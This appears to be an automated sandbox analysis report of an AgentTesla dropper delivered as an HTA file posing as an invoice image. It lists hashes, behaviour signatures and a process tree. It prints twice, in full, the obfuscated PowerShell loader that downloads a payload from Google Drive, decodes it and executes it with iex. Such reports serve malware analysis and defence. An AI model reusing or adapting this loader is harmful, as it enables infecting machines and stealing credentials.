Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240220-en locale:en-us os:windows7-x64 system
  • submitted
    21-05-2024 14:07

General

  • Target

    001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta

  • Size

    5KB

  • MD5

    3ef5759d457c58dc4c8c9b6c15aca5fe

  • SHA1

    be35dffec6716bfe6ece66f7e140b8df97d5b994

  • SHA256

    17e34e2c81eba5e138e335393b981fc11e2b21db0eecb2bc740dbbff7b9f8f32

  • SHA512

    c6b8c4452b774cd782b75891048ca0aacf1ffd0af55536e0d3a7643b6821b46004225b47bc4fbc81fd95c5f6f6aa0eb6dc34f659d0654b29a05b521c431b45e8

  • SSDEEP

    96:buOGiiV+5y/gkgBONHwBB9HaXa3U+1hTIbtu7ZEhtNsim57V+ICgCtUfkX:ypD/gkgywP9HaKk+rTIBeuhtNN2CLtUY

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request (2 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  • Looks up external IP address via web service (3 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (1 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings (1 TTPs, 1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (5 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of WriteProcessMemory (22 IoCs)

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. 
/Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"
        3⤵
          PID:2708
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bankerottens = 1;$Oversacrificially='Sub';$Oversacrificially+='strin';$Oversacrificially+='g';Function Anticipant($Harmonize){$Rjseren80=$Harmonize.Length-$Bankerottens;For($Papegjesygen18=1;$Papegjesygen18 -lt $Rjseren80;$Papegjesygen18+=2){$Funktionstegningernes+=$Harmonize.$Oversacrificially.Invoke( $Papegjesygen18, $Bankerottens);}$Funktionstegningernes;}function Harskes($Herligheds){. ($Undersay) ($Herligheds);}$Formularlngdes=Anticipant 'VM oGzbi.l.l.aS/ 5G.M0F (FW iYn dSoSwWsS MN TI ,1V0 .S0U;. ,WFiEn 6 4F;V SxU6E4D;C rUv :M1,2E1.. 0.)U MG e cFkso /M2C0 1W0F0H1.0,1S CFDi.rBeTf oLxP/B1 2i1..R0 ';$Baglokalers=Anticipant ' U sPeOrM- ACgSeMnUt. ';$Indpodede=Anticipant '.h.tVt pBs,: /L/ d r,iKvRe ..gMoBo g.l e . c oOm,/ u cG?.e x pAo.r t =Fd,osw nZlFo a d &Oi,d =,1V7HG yRc eHO.U WC7 OIK,NDbPJHW Q.X x 4L9,cSB jfIOQ.lHvN-DM BFlKkR ';$Ogamic=Anticipant ' > ';$Undersay=Anticipant 'Ri e.x. ';$Goalage='Hovedmenuernes';$Miljmyndigheds = Anticipant ' eKcbh.oU E%Wa,pbpsdCaEtUaR%.\MFbdSeSg oDd sFeQr n e .HCDoTnU I&S&J Me c hUoK .t, ';Harskes (Anticipant ',$ g lRoAbSaHlP: dIi s,bAa nMd e d =M( cImBd. 
/Cc T$FMTiel jfm,ySn dSiFg h eFd s,)T ');Harskes (Anticipant 'G$CgKlVoJb.aDl :DA n.n.e.k,s kDi r kBeBsa=P$KIGnSd.p oBd.eAdBeS.,sGpllSiht.(A$,O g.a,mBi,c.)C ');$Indpodede=$Annekskirkes[0];$Revisorforeningens= (Anticipant 'C$.g.lDo,bNaLlM:aOGmSs tTr.u,k tUuvrSe.rSi,nHgRe r,=,N,e wB-SOnb.j,e c tM S y sFt,egmA.PNFeCtT..W,e,b C,lFiSePn t');$Revisorforeningens+=$disbanded[1];Harskes ($Revisorforeningens);Harskes (Anticipant 'R$,O,mNsMt rCuRkDtBu.r eRr i n.g.e,rA.,HRe,a,d e r s,[ $PBLa.gUlUo.kta lBe,r,s ],=,$GFSobr,m uKlFa,rVl nTg d.e sE ');$Countersunken196=Anticipant ',$NOSmBs tFr uGk tPuFr,e r i n g e r..BDNoKwMnSlOo a d F.iSl,e.(.$.I.n,d pAoDdAeFdBeR, $ Z i.nTyCa,mRu n gZa )I ';$Zinyamunga=$disbanded[0];Harskes (Anticipant ' $NgblSo bBaFl :AO p h,vMe,sa=D(WTAe.sHt -SP a,tBhM .$.Z.i.n y a mCu n,g aP)C ');while (!$Ophves) {Harskes (Anticipant ' $,g,l o.bFa lb:KAIn dde,sobFj,e rFgEeOn e,1F2.3 =R$UtCr u eS ') ;Harskes $Countersunken196;Harskes (Anticipant ',S t aHrVtS- SAl eKePp, T4. ');Harskes (Anticipant 'f$ g.l o,bTa.lO:OOHpEh,v.e,sN=A( TBeCsStS-.PGa tPh, T$SZ i nAy.aMm u nPgNaa) ') ;Harskes (Anticipant 'g$Fg lToPboaHlA:UF.y.r sLt,eCr sB=P$,gSlSoBb.a l :VT wSi n eNl,eBs sC+ +U%K$.A.n nSeJkPs k,i rHk eEsP.Bc.o usn,tR ') ;$Indpodede=$Annekskirkes[$Fyrsters];}$Stormagasiners=352755;$Terreplein=25708;Harskes (Anticipant 'F$ gSl o,b a l.:sRFe g e ncs iPa n eDrSsH A= LGNe,t -SC o,n tPe.n tH S$ ZBi,nTyPaSm u,n g,a ');Harskes (Anticipant ' $ g,l oAbPaFlc:fV bBnKeFtF S= K[ SAyAsDt,e mW. CRoSnSvne r.t,] : : F.rHo m BHaOsSeU6.4AS.tNrci.nMg.(A$PRAeggFeSn sSiTa.n e,r sW)C ');Harskes (Anticipant 'A$bg l,oIb a lB:DBSrEu m a l .= [,S y s t.e m,.,TVe.xRt . ESn,c,oBd iSnUg ]I:A:,AVSHCBI IE.LG,eSt,Sdt,rTi.nHgE(S$KVEbTn eCtN)T ');Harskes (Anticipant 'F$,g l o b a lL: REe tCsSb e t.jTe,nFt = $bB,r uFmSa.lL.,sDu bIs tIrCi,nfg (A$ S t oOrBmRaMg aPs,i nKeErCs., $VTIe,r r,e.pPl,e,isn.), ');Harskes $Retsbetjent;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2128
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fdegodserne.Con && echo t"
            4⤵
              PID:2300
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:772

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Roaming\Fdegodserne.Con

        Filesize

        492KB

        MD5

        1fe03ff02fd5bae7e909af7c3471a4c7

        SHA1

        cb1bb668c0e0191b63d7aac5ecd4117b8d05647e

        SHA256

        b9aa136cd82e7b1c7381598d12be3297722ef09c005344168594fc5a1ed1414b

        SHA512

        83d9a6c8de897c7d98b30117f7a94bd1048e33cd47961d75fd6ac0c7cf870ad6949265485b91a899f81fd5a0fca03a295281c4a6e46f29034b1db11b61e9696d

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        8b440fa10a50e50914834593003b11e3

        SHA1

        6d5ba40eb8cee52d35b868528e22426ee8af1522

        SHA256

        2b354ddf661155540d79b8e6929894ce48d3fbd2d922e2620c32257e2209b09f

        SHA512

        9c04fa268015ac8a945aa971fd24db85df807a766276b2f22cae9c1a5156e52a6fb4228f3031a296336fd115fe45ec5bbe7537d115accd4176179aa6d919df08

      • memory/772-38-0x0000000000620000-0x0000000001682000-memory.dmp

        Filesize

        16.4MB

      • memory/772-39-0x0000000000620000-0x0000000000662000-memory.dmp

        Filesize

        264KB

      • memory/2128-15-0x00000000066F0000-0x000000000A562000-memory.dmp

        Filesize

        62.4MB